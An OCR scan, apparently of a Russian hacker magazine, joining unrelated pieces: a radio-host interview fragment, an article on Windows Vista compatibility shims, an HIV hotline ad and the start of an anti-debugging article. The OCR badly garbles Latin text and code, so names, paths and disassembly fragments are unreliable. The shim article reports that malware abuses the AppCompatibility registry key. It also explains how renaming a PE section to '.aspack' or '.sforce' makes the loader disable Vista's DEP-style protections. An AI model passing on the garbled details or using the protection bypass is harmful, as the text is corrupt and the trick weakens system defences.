Саймон вежливо улыбается, на вопросы отвечает исчерпывающе. однако в глубине черных глаз то и депо 
вспыхивают чертики В красной бандане, с настоящей рэперской целью на шее и обворожительной улыбкой он 
смахивает на пирата и ялли в одном флаконе 

• Саймон не любит об этом вспоминать - он ведь гангстер в прошлом. - улыбается Морозова - Что вы там делали. 
Саймон, дрались стенка на стенку? 

- Ты же видишь, сколько у меня шрамов?! - Саймон захатывает рукава - Я даже в школу ходил тогда с пистолетом. 
Думал - все меня боятся, и ничего круче уже не мо»ег быть. Я такую жиж» прожил - можно книгу писать Но Россия 
меня успокоила - похоже, навсегда! Понял что если буду так себя вести в чужой стране, долго не протяну Саймон е 
далекой Нигерии учился на врача, но в университете начались перестрелки пришлось уехать в Россию Здесь 
переквалифицировался в ІТ-шника окончив питерский институт точной механики и оптики Потом перебрался в 
Москву, где получил славу самого техничного англоязычного МС. горячего диджея и хип-хоп продюсера. Теперь, став 
«черным перцем» в утреннем эфире ЕИЕЯСѴ, резко поменял свой график - встает в пятъ утра, а в семь уже сидит у 
микрофона. Хотя с ночной жизнью так и не завязал - бывает, после горячего сета едет прямо в студию. 

- Я вообще никогда так рано не вставал - в семь утра только из клуба возвращался А теперь удивляюсь - я все 
еще жив и даже привык' Приходишь в студию никакой глаза закрываются, голова спит, и вдруг слышу в «ушах» 
отбивку • «Э-нер-жи-ииииі. - напевает Саймон. - И сна как на бывало, честно! Но до сих лор так и не помял, как 
можно одновременно думать и так быстро говорить, как Абитаева?! Наверное, это единственное, чему я никогда не 
научусь! 

- Часто бывает, что мы уже с Морозовой давно пошутили, поржали и забыли, и тут Саймон вылезает по теме 
кжирафы». - Абитаева еле сдерживает смех. • Называется, дошло 

- Вот это «реалио приколно» и «в этом вся соя», - пародирует Саймона Морозова. - Никогда не знаешь что Саймон 
скажет в следующую минуту, правильно ли он тебя понял и даст ли ответ именно на твой вопрос... 

• Слово «жираф» я понял сразу. • отбивается Саймон. - Но жирафа ведь тоже нужно кормить (Хохочут) 




Олыв Юрьева 
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сем известно как «хорошо» дружит 



виста с древним со 




ным до нее. И, хотя сейчас ситуация 



же не та, что пару лет назад — над 



проблемой совместимости активно 



аоотают с двух сторон оаррикад. 



добавляет специальный «о 



одной» код для поддержки старых 



программ, а производители со 



взяли за правило тестировать новые 



приложения под вистои и даже для 



анее выпущенных версии имеются 



специальные заплатки, патчи и 
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погоды, мы — хакеры — уже вовсю 
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□ ы не будем говорить о (не)целесообразности перехода на 
Висту и агитировать за то, чтобы остаться сидеть на ХР (или 
даже под ѴѴ2К], поскольку, если следовать этой логике, самой 
привлекательной операционной системой окажется І_іпих, ато 
и РгееВЗО. Люди переходятна Висту по самым разным мотивам (например, 
сложности поиска драйверов подХРдля ноутбука, на котором предустанов- 
лена Виста) или просто хотят очутиться в авангарде прогресса. 

Личноя менять ѴѴ2Кна Висту не собираюсь, но и полностью игнориро- 
вать ее существование тоже не могу. Если программы не пойдут на Висте, 
объемы продажупадут в разы. Лого «Ѵізіа сотрабЫе» дорогого стоит. 
МісгозоЛ выпустила кучу спецификаций, которым мы должны следовать 
для достижения совместимости и которых столько, что до конца сезона не 
скурить. Но одних лишь спецификаций мало. Отладчик нужен. И желатель- 
но не простой, а ядерный. Любимый всеми зоК-ісе под Вистой не идет, и 
поддержка его прекращена много леттому назад. Хоть грызи зубами лед, 
хоть убейся о газель, а другого такого отладчика нети не будет. Вот потому в 
настоящее время я занятпереносом зоіі-ісе под Висту и 5егѵег2008. 
Километры распечаток, бессонные ночи, проведенные в ядре Висты, 
лицо с характерным отпечатком клавиатуры, на которую я падал, когда 
не оставалось сил доползти до топчана... Виста (в худшем смысле этого 
слова) — это действительно большой шаг вперед и изменений там... Чем 
более в нее зарываешься дизассемблером, тем сильнее поражаешься 
— как вообще старые приложения ухитряются на ней работать? Ведь 
исходя из самых общих рассуждений — не должны. Ну никак не должны. 

А работают. 

На самом деле, ничего удивительного здесь нет. История четверть вековой 
давности вновь повторяется. Когда вышла ѴѴіпсІоѵѵз 95, то приложения, 
написанные под МЗ-ООЗ/ѴѴіпсіоѵѵб 3.x, хором отказывались под ней рабо- 
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тать (особенно игры) и, чтобы завоевать рынок, парни из МісгозоЛ (в число 
которых входил и Реймонд Чен (РаутопсІ Сбеп), знаменитый своим блогом 
«ТЬе ОШ ЫеѵѵТЫпд»: ЬирУ/ЬІодз.тзбп.сотМбпеѵѵіЫпд/ ) не вылезали из- 
под дизассемблеров и деббагеров, разбираясь в чем причина отказа. 

В большинстве случаев, дело было не в ѴѴіпсІоѵѵз, а в ошибках сторонних 
разработчиков, которых Місгозоіі: ты кала носом всвоеже дерьмо. Типа 
— нагадили, нутак исправляйте! Если же разработчики шли на принцип и 
договориться сними по-хорошему не получалось, приходилось править код 
самой операционной системы, добавляя взагрузчикисполняемых файлов 
специальный модуль, распознающий конфликтные приложения и выби- 
рающую адекватную модель поведения операционной системы или же 
правящий код конфликтного приложения непосредственно в оперативной 
памяти (забавно, но по американским законам для исправления ошибок 
сторонних разработчиков М іеговой должна была получить от них разреше- 
ние на правку багистного кода, воттебе бабушка и демократия!). 

Раздел реестра АррСотрабЬіІіІу Менеджера Сессий (Беззіоп Мападег) 
содержал (и содержит!) сотни приложений суказанием действий, 
которые система должна предпринять для их запуска (полный путь 
выглядиттак: НКІ_М\5У5ТЕМ\СиггепЮоп1:го1.5е1:\Соп1:гоІ\5е55Іоп Мападег\ 
АррСотрабЬіІіІу). В частности, некогда популярная игра 5іт-Ску исполь- 
зовала уже освобожденный блок памяти, закладываясь на неизменность 
его содержимого, что прокатывало в однозадачной М5-005, но вот перед 
запуском 5іт-СіІу в многозадачной ѴѴіпсІоѵѵз приходилось применять 
специальную модель распределения памяти, гарантирующую, что освобож- 
денный блок не будет использован никем другим вплоть до завершения 
приложения. 

Листая содержимое АррСотраІіЬіІНу, не устаешь поражаться сколько 
же здесь знакомых имен! И аѵр.ехе, и соттапсіоз.ехе, и боот95.ехе, и 
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пего40.ехе, и даже ОігесО(7а.ехе, выпущенный непосредственно самой 
МісгозоШ Выходит, что система имеет встроенные (ЬагсІ-сосІесІ ЬиіШ-іп) 
средства для обеспечения совместимости с приложениями, использую- 
щими грязные приемы программирования, например, обращающихся к 
недокументированным (и потому подверженным постоянным изменениям) 
АРІ-функциям и структурам данных! Как их примерить с Вистой? Добавляем 
новую запись в раздел АррСотрабЬіШу — увы! не всетак просто! Формат 
ключа АррСотрабЬіІіІу и флаги, управляющие поведением операционной 
системы недокументированы. Я как раз сейчас занимаюсь их всесторонним 
изучением. 

Опознание приложений осуществляется по имени исполняемого файла 
потому мы можем попытать счастья, последовательно переименовывая 
конфликтную программу в одно из имен, прописанных в АррСотрабЬіІііу 

— а вдруг их несовместимости совпадут и все магическим образом зарабо- 
тает? Аналогичного результата можно добиться скопировав существующую 
ветвь АррСотрабЬіІіІу и присвоив ей имя нашего исполняемого файла 
(некоторые приложения отказываются работать, если их исполняемый файл 
переименован). Способ, конечно, грязный, но он достаточно часто срабаты- 
вает, чтобы от него отказываться. 

Плохая новость — вирусы с червями уже взяли ключ АррСотрабЬіІіІу на 
вооружение. Что они могут с ним сделать? Да много чего! Прописав сюда 
ехріогег.ехе они не только отключат все защиты, какие только есть, но еще 
и (при желании с их стороны) пропатчат ехріогег.ехе (или любую другую 
программу, например, антивирус) так, чтобы она выполняла зловредный 
зИеІІ-код. И количество таких вирусов неуклонно растет! 

Ксожалению, несмотря на свое высокое положение в Місгозо^, Реймонд 
Чен так и не смог прищемить коллектив разработчиков Висты, решивших, 
что самое главное — это написать как можно больше никому ненужного 
кода, натянуть на него интерфейс с кучей спецэффектов, а на совмес- 
тимость можно и забить. Теперь, чтобы заставить старый код работать 
в новой операционной среде, приходится добавлять специальные 
промежуточные слои, эмулирующие поведение старой системы, ценой 
разбухания кода и снижения защищенности, но об этом мы еще погово- 
рим, а пока рассмотрим некоторыетехнические аспекты АррСотраШзіШу. 
Мы же хакеры! И пока не пропустим Висту через дизассемблер, ни за что 
неуспокоимся! 

0 ФОРСИРОВАННЫЙ ЗАПУСК В РЕЖИМЕ СОВМЕСТИМОСТИ 

Прежде чем лезть вглубь и рыть тоннель сквозьтолщу скал, вспомним, что 
пользователи — тоже люди и заставлять ихтрахаться с дизассемблером 

— по меньшей мере, негуманно, а потому МісгозоЙ предусмотрительно 
реализовала механизм форсированной совместимости. 

Щелкаем правой клавишей по исполняемому файлу, выбираем «Свойства» 
(Ргорегбез).там находим вкладку «Совместимость» (СотрабЬіІіІу) с выпа- 
дающим списком операционных систем отХР 5Р2 до ѴѴіпсІоѵѵз 95, которые 
Виста будет эмулировать для устранения конфликтов. Там же находится 
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Хакерский способ запуска конфликтных файлов в режиме совместимости 



чек-бокс «Выполнять эту программу от имени администратора» — ну 
так он еще со времен ѴѴ2Кторчит, только там это делалось через гипаз, у 
которой, кстати говоря, и настроек побольше. 

Это же крышей поехать можно, если представить какие улетные пер- 
спективы открываются! Однако попытка запустить под Вистой игрушку, 
прекрасно идущую под ѴѴіпсіоѵѵб 9х, быстро возвращает крышу на место 
и эйфории приходит конец. Вот так облом! Для тех, кто не в теме — еще 
во времена ранней молодости М5-005 в штатный комплект поставки 
входила утилита зеіѵег, позволяющая задать любую версию системы, 
какую нам только заблагорассудится, поскольку некоторые программы 
отказывались работать с М5-005, чьей версии они не знали. Иногда из 
предосторожности, но чаще по причине использования недокументиро- 
ванных функций и структур данных, меняющихся от версии к версии, как 
раз к ним-то веіѵег даже не прикасалась и пользы от нее. Точно так обсто- 
ят дела и с Вистой. Выбор операционной системы влияеттолько на номер 
версии, возвращаемый данному приложению и некоторые системные 
политики, но ядро и сопутствующие ему библиотеки остаются прежними. 
А ядро у Висты «выдрано» из Зегѵег’а 2003 и с ХР (базирующейся на ѴѴ2К) 
имеет мало общего, не говоря уже о линейке 9х! Все эти ядра писали 
разные коллективы разработчиков, придерживаясь (или не придержи- 
ваясь) определенных внутрифирменных стандартов и спецификаций, а 
спецификации, какхорошо известно, крайне редко бывают полными и 
однозначными. Вот и получилось, что одни и те же АРІ-функции каждый 
коллектив разработчиков реализовал на свой манер, и их поведение 
слегка отличается, но этого «слегка» вполне достаточно для краха прило- 
жений. Полного списка отличий ядра ХР от5егѵег2003 нет ни у кого, даже 
у МісгобоЛ, а потому прикинуться другой системой Виста не может при 
всем своем желании! 

А если приложение (запущенное в режиме совместимости, конечно) 
попытается под Вистой вызывать пабѵе-АРІ функцию от9х, то откуда же 
ей взяться в ЫТ- подобном ядре?! А ядро в Висте всего одно (ну не совсем 
одно, конечно, ноужточно не полная коллекция всего, что успели понапи- 
сать в МісгобоЛ за это время). 

С другой стороны, Виста поддерживаетаппаратную виртуализацию, в 
разы снижающую накладные расходы на эмуляцию. Просто устанавлива- 
ем Ѵігіиаі РС (а обладателем Зегѵег 2008 и устанавливать ничего не нужно) 
и создаем столько виртуальных машин, сколько заблагорассудится, уста- 
навливая на них «зоопарк» операционных систем, заставляющих забыть 
о проблеме совместимости раз и навсегда. 

Код, обеспечивающий совместимость Висты со старыми приложения- 
ми, не сосредоточен в каком-то конкретном файле, а размазан по всей 
системе — одни компоненты распознаютзагрузку проблемных программ 
и выставляют скрытые флаги, подхватываемые другими компонентами, 



обитающими на различныхуровнях иерархии: от прикладного режи- 
ма до самого ядра. Хорошо, заходим РАР’ом в каталог с Вистой и ищем 
контекстным поиском строку АррСотрабЬіІіІу во всех исполняемых 
файлах и динамических библиотеках (в уникоде, разумеется). Получаем: 
ІІ5ЕР32.0Щ 5НЕІ_І_32.0І_І_ и 5І_АѴЕРІЛ.ВІ_І_. Всего три библиотеки? Но 
если вспомнить, что это всего лишь вершина айсберга, обрабатывающая 
обозначенную ветвь реестра и выполняющая простейшие действия по 
обеспечению обратной совместимости, перекладывая основную работу 
на ядро, то мало не будет! 

Анализ показывает, что первичная обработка АррСотрабЬіІіІу осуще- 
ствляется в недрах библиотеки асіауегз.сііі с внутреннем именем «5Ыт 
Ассеззогу ОІ_І_». В переводе с английского «вЫт» означает«прокладку», 
а «ассеззогу» — нечто вспомогательное. Короче, промежуточный слой 
для обеспечения обратной совместимости. Дизассемблер показывает не 
только полный путь к ключу АррСотрабЬіІіІу, но и параметры, управляю- 
щие режимом совместимости, например, «ОПРа^сЬ-у», а потому, если 
кому-то потребуется устранить конфликте программой, отсутствующей в 
данном списке, то рыть нужно именно отсюда. 

ФРАГМЕНТ КОДА АСІ_АУЕК5.0І_І_, , ОБРАЩАЮЩИЙСЯ К 

АРРСОМРАТІВІЫТѴ 

ипісосіе 0 , <у> , О 

аБІ1раРс1іУ_0 : 

ипісосіе 0, <БІІРабс1і-у> , 0 

аКедізДгуМасЪіп : 

ипісосіе 0, <\КедізРгу\Мас1ііпе\ЗузДеш\ 

СиггепРСоп1:го13е1:\С> 

ипісосіе 0, <опДго1\Зеззіоп Мападег\ 

АррСошраІгіЬіІі Ду> , 0 

Впрочем, не стоит обольщаться. Львиная доля возможностей библиотеки 
«5Ыт Ассеззогу ОІ_І_» реализована в ней самой. Она часто прибегает к 
перехвату АРІ -функций из КЕРЫЕІ_32.ВІ_І_ и навешивает на них свои соб- 
ственные обработчики, изменяющие поведение перехваченных функций 
или выполняющие дополнительные действия для устранения конфликтов 
с Вистой непосредственно в контексте «подопытного» приложения. 
Фактически, ветвь АррСот раб Ьііііу содержит всего лишь базовые ука- 
зания: какие действия должна выполнить библиотека асІауегз.сШ перед 
запуском конфликтных приложений, при этом 90% действий реализовано 
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внутри асІауегз.сШ, а не в реестре. То есть, возможности «рукотворного» 
добавления новых записей в АррСотраІіЬіІіІу достаточно жестко ограни- 
чены архитектурой системы, однако, если не лезть в исправлениетяжелых 
конфликтов, предоставленного функционала хватаете головой. 
Библиотека ІІ5ЕР32.0І_І_ (обертка вокруг драйвера ѴѴІЫ32К.5У5, 
реализующая пользовательских интерфейс вместе с графической 
подсистемой] также обращается к АррСотрабЬіІіІу из АРІ-функции 
СІіепГГЬгеасІЗеІир, которая в свою очередь вызывается из АРІ-функции 
ІІзегСІіепіПШпШаІіге, подготовляющей оконную и графическую подсис- 
тему для использования в контексте конкретного приложения с учетом его 
требований к обратной совместимости: 

ФРАГМЕНТ КОДА ІІ5ЕК32.0І.І-, ОБРАЩАЮЩИЙСЯ К 

АРРСОМРАТІВІЫТУ 

аКедізбгуМас1і_5 : 

ипісосіе 0, <\КедізЕгу\МасЪіпе\Зуз1:ет\ 

СиггепДСоп1:го15еб\С> 

ипісосіе 0, <опДго1\5еззіоп Мападег\ 

АррСотраЪіЪі1іЪу> , О 

Вот в эту часть кода лучше не лезть. Оконная подсистема Висты претер- 
пела значительные изменения, но разобраться, какие именно изменения 
разваливают ранее написанную программу намного сложнее, чем кажет- 
ся. Тут одного отладчика и дизассемблера явно недостаточно! Необхо- 
димо трассировать программу под новой и старой системой, сравнивая 
результаты прогонов, представляющих собой огромные Іод-файлы с кучей 
непонятных строк. 

Н ЧТО НОВОГО В ВИСТЕ И БЕКѴЕК 2008 

МісгозоЛ предупреждает: использование недокументированных АРІ-функ- 
ций и структур данных опасно для вашего здоровья! Воттолько програм- 
мисты чихать хотели на свое здоровье (в смысле, на совместимость] и ведут 
крайне нездоровый образжизни (стиль кодирования], буквально нашпи- 
гованный недокументированными возможностями. И ведь не отхорошей 
жизни! 

Взять хотя бы функцию ОрепТЬгеасІ, отсутствующую в первой редакции 
стандарта ѵѵі п32-АРІ , разработчики которого умышленно изъяли ее в 
целях безопасности. Мол, нечего открывать чужие потоки, а если поток 
хочет, чтобы его открыли — пускай передает свой дескриптор через один 
из многочисленных механизмов, имеющихся в распоряжении про- 
граммиста. ОК, вообразим себе поток, созданный зловредным вирусом, 
который (в здравом уме и трезвой памяти) явным образом передает свой 
дескриптор антивирусам (а для этого еще и протокол взаимодействия 
вируса с антивирусом придумать нужно и стандартизовать, чтобы все ему 
подчинялись], мол, братья антивирусы, проверьте меня, пожалуйста и, 
убедившись, что я действительно вирус, а не полезная программа, тутже 
прибейте меня без суда и следствия. А вот дудки! Никакой вирус сотрудни- 
чать с антивирусом не будет и без ОрепТЬгеасІ разработчикам последних 



пришлось бы оченьтуго. Самое интересное, что обозначенная функция в 
РЛ-системахтаки есть (пускай и не упомянута в документации]. В 9х полу- 
чить дескриптор потока чуть-чуть сложнее, но все-таки возможно. 

Поэтому я повторяю еще раз: к недокументированным возможностям про- 
граммисты обращаются тогда, когда легальными средствами поставлен- 
ная задача не решается (либо ее решение выходит слишком громоздким 
и не удовлетворяющим ТЗ). Конечно, встречаются и маньяки, обращаю- 
щиеся к недокументированным функциями без всякой нужды (особенно 
много таких среди разработчиков протекторов и вирусописателей], но 
это контингент отдельного дурдома, которому программирование вообще 
противопоказано по жизни. Попав на Бі п их, они создают программы, 
запускающиеся только на их собственных машинах, да и то только до пер- 
вой перекомпиляции ядра. Впрочем, мы отвлеклись. Вернемся к нашим 
баранам. 

Итак, недокументированные АРІ-функции и структуры. Как ни печально, 
но они (втой или иной мере) встречаются практически в каждой програм- 
ме, включая коммерческие приложения. Главным образом программисты 
лезут в ТІВ (ТЬгеасІ Іпіогтаііоп Віоск — Блок Информации о Потоке], на 
который указывает селектор Б и который содержит указатель на РЕВ 
(Ргосезз Епѵігоптепі: Віоск — Блок Окружения Процесса], лежащий по 
смещению ЗОЬ байт от начала ТІВ и содержащий целую кладезь информа- 
ции. Недокументированной, естественно. 

Ноуже давно исследованной хакерами и описанной в доступной литера- 
туре (см. например. ЬіІр://Ьоок.іІ2его.сот/геаб/тісгозоіі/0507/Місго5оіі. 
Ргез5.Місг050ІЕ ѴѴі псіоѵѵз.іпіегпаіз. Рои гіЬ.ЕсІіііоп.Рес. 2004. іпіетаі. 
РіхесІ.еВоок-РРЦ Ы:тІ/0735619174/сЬ061еѵІ5есЗ.Ы:тІи ипсіоситепіесі. 
пІіпІегпаІз.пеі/ЦзегМобе/ЦпсІоситепІесІ РипсІіопз/ЫТ ОЬіесіз/Ргосезз/ 
РЕВ.Ыгтй ). 

Проблема втом, что содержимое ТІВ’а и РЕВ’а, будучи внутренней кухней 
операционной системы, непредсказуемым образом меняется отверсии к 
версии и неизменным остается лишь небольшое подмножество базовых 
полей, да и то без всяких гарантий, что в следующей версии ѴѴіпсІоѵѵз 
здесь не окажется что-то другое. 

Рассмотрим следующий фрагмент кода, выдернутый из отладчика 
зоіі-ісе: 

ФРАГМЕНТ ПСЕВДОКОДА ИЗ БОРИСЕ («ПСЕВДО» ПОТОМУ ЧТО В 

ДЕЙСТВИТЕЛЬНОСТИ ОБОЗНАЧЕННЫЙ КОД НАМНОГО СЛОЖЕНИЕ) 

шоѵ еах, Гз: [12 4Ті ] ; сиггепЕ ЕЪхеасІ 

#іб ОЗ == ХР 

шоѵ еах, [еах+44Ъ] ; КРК.ОСЕЗЗ 

#еп1іГ 

#іб ОЗ == 3егѵег2 003 

шоѵ еах, [еах+38] ; КРКОСЕ35 

#еп1іГ 

шоѵ еах, [еах+18] ; ОігесііогуТаЫеВазе 
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Вспомнив, что Виста основана на ядре от5егѵег2003, мы поймем, почему 
большинство программ из тех, что идут на ХР, отказываются работать под 
Вистой (а если учесть и многочисленные изменения, внесенные в ядро 
Бегѵег’а 2003 разработчиками Висты становится понятно, где порылась 
собака на почве «хорошей» обратной совместимости). Самое печальное, 
что не существует никакой возможности вернуть недокументирован- 
ные структуры взад, поскольку они в действительности принадлежат не 
процессу, а ядру. Теоретически вполне возможно заставить ядро работать 
с несколькими версиями структур данных, но практически для этого льви- 
ную долю ядерного кода пришлось бы переписать заново, и выход Висты 
состоялся бы не в 2007 году, а лет эдак через десять :). На самом деле, 
МісгозоИ (прекрасно осведомленная, что программисты напропалую ис- 
пользуют недокументированные структуры данных) сохранила наиболее 
популярные поля на своих местах и заложила механизм эмуляции некото- 
рых полей изтех, что были все-таки перемещены, но пока он реализован 
лишь в зачаточной форме. 

Другое существенное отличие отХР — механизм рандомизации адресного 
пространства — Асісігезз Брасе І_ауоиІ Напсіотііаііоп или, сокращенно, 
А5І_Р, впервые появившийся в мире II N IX и скопированный фирмой 
МісгозоИ для затруднения хакерских атак. Ну нападки на Висту прекра- 
щаться не собираются, а вотсистемные динамические библиотеки теперь 
отображаются в память по случайным адресам, выбираемым на стадии 
загрузки операционной системы. Стек и кучатакже рандомизированны. 
Приложения, написанные до Висты, грузятся по адресам, прописанным 
в их заголовке, а вот для новых приложений имеется возможность задей- 
ствовать А5І_Н и для самого исполняемого модуля. Но все-таки вернемся 
кстарым программам. Можетли рандомизация служить причиной отказа 
их работоспособности — МісгозоЙ полагает, что нет, но практика выявляет 
обратное. 

Вот вполнетипичная ситуация — программистсохраняет некоторые 
структуры данных на диск, в которых оказываются (по чистой случайности, 
конечно) указатели на локальные переменные, расположенные в стеке. 

На ХР, где стек всегда начинается с одного и того же адреса, ошибка (а 
это именно ошибка) никак не проявляется и все работает. Но стоиттолько 
попасть такой программе на Висту, как она начинает падать стремитель- 
ным домкратом. Тоже самое относится и к рандомизации кучи. Ауж как 
рандомизация затрудняет отладку, можно даже не говорить. 
Программистские форумы буквально пестрят вопросами: как отключить 
рандомизацию? Официально — никак. Но не будетспешитьс выводами, а 
лучше рассмотрим еще одну интересную особенность Висты — запрет на 
исполнение кода в стеке. Впервые этот механизм появился в ХР 5Р2 при 
обязательной аппаратной поддержке со стороны процессоров, реали- 
зовавших пресловутые биты ЫХ/Хй, позволяющие управлять атрибутом 
ЕхесиІаЫе на уровне отдельных страниц. До этого х86 поддерживали 
атрибут исполняемый исключительно на уровне селекторов, то есть, учи- 
тывая плоскую модель памяти ѴѴіпсІоѵѵз, не поддерживали его вообще. И 
хотя ѵѵіп32 АРІ предполагает наличие подобного атрибута, программистам 
было хорошо известно, что х86 процессоры реально поддерживаюттолько 
два атрибута — атрибут на доступ и атрибут на запись, таким образом, 

РАО Е_РЕАО тождественен РА6Е_ЕХЕС1ЛЕ. Большинство программ, ис- 
полняющих код в стеке или куче, довольствовались атрибутом на чтение 
и все работало. Но вотпришли злые дядьки и постановили: дальшетак 
жить нельзя, типа от этого вирусы разводятся, збеіі-код выполняется и 
вообще. Так появился механизм БЕР Юаіа Ехесибоп Ргеѵепііоп), предот- 
вращающий исполнение данных там, где по мнению создателей ѴѴіпсІоѵѵз, 
они исполняться не должны. ВХР5Р2 поумолчанию защищались лишь 
системные компоненты. 



Ктой же категории относится и механизм БаІеБЕН, впервые анонсиро- 
ванный вХР5Р2, но реально доделанный лишь с выходом Висты. Его 
безопасность заключается в том, что обработчик исключений не может 
размещаться в стеке и, что самое неприятное, обработчик не может 
назначаться динамически. 

Компилятор (вместе с линкером) должен создавать статические таблицы, 
размещающиеся в специальной секции РЕ-файла. Последнеетребова- 
ние относится, как нетрудно догадаться, только к новым приложениям (у 
них в заголовке явным образом прописано использование БаІеБЕН), но 
вотзапрет на помещение обработчика исключения в стек распростра- 
няется на все приложения, а ведь многие из них именно так и делают 
— динамически назначаютобработчики кладутего в стек. НаХР5Р2 и 
Висте они, соответственно, работать не могут. 

Археологические раскопки недр І\ІТОІ_І_.ОІ_І_ выявляют весьма любопыт- 
ный факт. 

Системный загрузчик проверяет имена секций каждого запускаемого 
исполняемого файла (динамической библиотеки) и, если находит секцию 
с именем «.азраск», «.рсіе», «.зіогсе», предпринимает ряд действий по 
обеспечению обратной совместимости и взводит флаги, вырубающие кучу 
защит, появившихся в Висте и не отключаемых легальным путем. Никаких 
других дополнительных проверок не выполняется. Достаточно совпаде- 
ние имени секции — воти все. 

ФРАГМЕНТ КОДА ИЗ МТОИ.ОИ С ИМЕНАМ СЕКЦИЙ РЕ-ФАЙЛА ДЛЯ 

КОТОРЫХ ЗАДЕЙСТВУЕТСЯ СПЕЦИАЛЬНЫЙ РЕЖИМ СОВМЕСТИМОСТИ 



аЗесзегѵ_с!11 


ЙЬ 


' зесзегѵ. <3.11 1 


, 0 ; РАТА ХКЕР 


зиЪ_77Р0В5Е5+3 б 






а_збогсе 


ЙЬ 


' . збогсе ' , 0 


; БАТА ХКЕР 


зиЬ_77Р0В717+85 






а_рс1е 


ЙЬ 


' .рсіе ' , 0 


; ОАТА ХКЕР : зиЪ_ 


77Р0В717+6Р 








а_азраск 


ЙЬ 


' . азраск ' , 0 


; БАТА ХКЕР 



ЗііЬ_77Р0В717 + 59 

Сюрприз, да? Оказывается, если упаковать проблемную программу 
упаковщиком АБРаск (кстати говоря, скупленным фирмой Біаг Рогсе), то 
шансы, что она заработает под Вистой существенно возрастут. А можно 
и неупаковывать, а просто взять в руки Ьіеѵѵ и переименовать секцию 
«.Іехі» (или «.СОйЕ») в «.азраск». 

Секции с именами «.збэгсе» принадлежат файлам, защищенным протек- 
тором Біаг Рогсе (странно, что МісгобоЛ: вообще знает об этой недоделке), 
для совместимости с которым приходится не только вырубать кучу защит, 
но даже эмулировать особенности поведения некоторых недокументиро- 
ванных АРІ-функций и структур данных. Короче, «.зРэгсе» намного круче, 
чем «.азраск»! 

Кому принадлежит имя «.рсіе», я не знаю. Поиск по Интернету ничего 
вразумительного не дал, но если есть желание поэкспериментировать, то 
можно воспользоваться и им. 

Короче, берем НІЕѴѴ, загружаем в него конфликтное приложение, нажа- 
тием на <ЕІ\ІТЕП> переходим в Ьех-режим, давим на <РЗ> для активации 
редактирования и меняем имя кодовой секции (обычно «.Іехі» или 
«.СОйЕ») на «.зіогсе» (см. рис. 5). 

Сохраняем изменения по <Р9> и выходим. Если файл использует кон- 
трольную сумму для проверки своей целостности, ее можно пересчитать 
с помощью утилиты есіііЬіп.ехе, входящей в комплект поставки Місгозоіі 
ѴізиаІБішсІіо, запущенной с ключом «/ПЕІ_ЕА5Е». □с 
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...соблюдаешь 
правила - 

спокоен, ты в 

порядке... 

Маша и Дима знают, 
нан защитить себя от ВИЧ 



ВСЕ, ЧТО ТЫ ХОЧЕШЬ ЗНАТЬ о ВИЧ/СПИДе 

АНОНИМНО, БЕСПЛАТНО 



8 800 100 65 43 

Государственная горячая линия 



|ѵѵѵѵѵѵ.5 < Іор5рісІ.ги 



КАСАЕТСЯ КАЖДОГО 






АНТИОТЛАДОЧНЫХ 






а свою кодокопательскую жизнь я нарыл ооширную (и достаточно пол- 



ную; коллекцию антиотладочных приемов, надерганную из протекторов 



г сов, сгаск-те сов — плюс включающую мои собственные идеи и разра- 



ВСЕ АНТИОТЛАОЧНЫЕ ПРИЕМЫ ДЛЯ ЫТ- И ЦШХ- 



отки. Систематизировав разрозненные факты и разложив их по полочкам 




нтиотладочными приемами называютспособы противостояния 
отладчику, затрудняющие реконструкцию подопытной про- 
граммы, — от простого детекта до захвата ресурсов, жизненно 
необходимых отладчику для работы. Хотя отладчик далеко не 
единственный хакерский инструмент, нельзя объять необъятное, поэтому в 
статье мы решили сосредоточиться исключительно на антиотладке. 
Написано о ней столько, что нетрудно и утонуть в этом море беспорядочной 
информации. Большинство статей охватываетлишь малый кругантиот- 
ладочных приемов, причем часть из них несовместима с современными 
операционными системами, а часть уже неактуальна, так какавтоматичес- 
ки распознается современными же отладчиками. 

Я поставил перед собой несколько задач. Во-первых, систематизировать всю 
имеющуюся информацию и протестировать каждый антиотладочный прием под 
десятком популярных отладчиков. Во-вторых, показать каким образом и с по- 
мощью каких плагинов их можно обойти— и как распознать эти плагины и ней- 
трализовать их. Воттакая рекурсивная тема получается: отладка -> антиотладка 
-> анти анти отладка антиантиантиотладка. И рекурсивный спуск на этом не 
останавливается — ведь количество приставок«анти» ничем не ограничено! :) 



г БОЕВОЙ АРСЕНАЛ 

В качестве базовой операционной системы для проведения экспериментов 
выбрана ѴѴ2К5Р0 и Кпорріх4.7 (ОеЬіап-ЬазесІ Ыпихсядром 2.4.x). Отличия 
остальных осей будут упоминаться по ходу статьи (если в этом возникнет 
необходимость). 

Подопытные отладчики — последние на момент публикации, при этом я 
считаю допустимым использовать внутренние билды, не выложенные в 
паблик-доступ. Естественно, оговаривая отличительные особенности их 
поведения (как правило, эти просто текущие фиксы ошибок и в пабликони 
попадают вместе со следующим релизом). 

Списокотладчиков с их кратким описанием и указанием версий приведен 
ниже. 

г ОШГОЕВиббЕКІ.ІО 

В просторечии «Ольга» или «Олли». Самый продвинутый гіпд-3 отладчик 
на сегодняшний день, ктомуже бесплатный. Основное преимущество 
— огромное количество плагинов, способных решить практически любую 
задачу и обломать рога даже крутым защитам. Недостаток — «движок» от- 
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ладчика работаетчерез М5 ОеЬиддіпд АРІ, страдающий кучей 
врожденных ограничений, оставляющий за собой множество 
трудноудаляемых следов и представляющий легкую мишень 
для антиотладочныхтехнологий. Для борьбы с последними 
приходится писать довольно сложные плагины, зачастую 
работающие на уровне нулевого кольца (то есть устанав- 
ливающие свой собственный драйвер). Другой недостаток 
— графический интерфейс, причем часть действий выполня- 
ется только мышью, ненавистной хакерам старого поколения, 
предпочитающим консоль и клаву. 

0 ОІ_І_Ѵ ОЕВІІООЕР 2.00С РВЕ-АІ_РНА 3 

Экспериментальный отладчике полностью переписанным 
ЬеЬид епдіпе и жестко урезанным функционалом (по сравне- 
нию с версией 1.10). Тем не менее, беЬид епдіпе по-прежнему 
использует М5 ОеЬиддіпд АРІ и это гіпд-3 отладчиксо всеми 
вытекающими отсюда ограничениями. 





0 ША РРО АОѴАЫСЕО 5.2 

Включает в себя довольно примитивный гіпд-3 отладчик, 
работающий через М5 ОеЬиддіпд АРІ (в ІЧТ) и через библиоте- 
ку рігасе (в Ы N IX) , что делает ее легкой добычей для защитных 
механизмов. Готовых антиантиотладочных плагинов под 
ИДУ раз два и обчелся, но при наличии 50К всегда можно 
написать свой собственный (правда, вместе с этим придется 
писать еще кучу недостающего функционала, уже реализо- 
ванного у конкурентов). Пожалуй, единственное преимуще- 
ство интегрированного отладчика — возможность отладки 
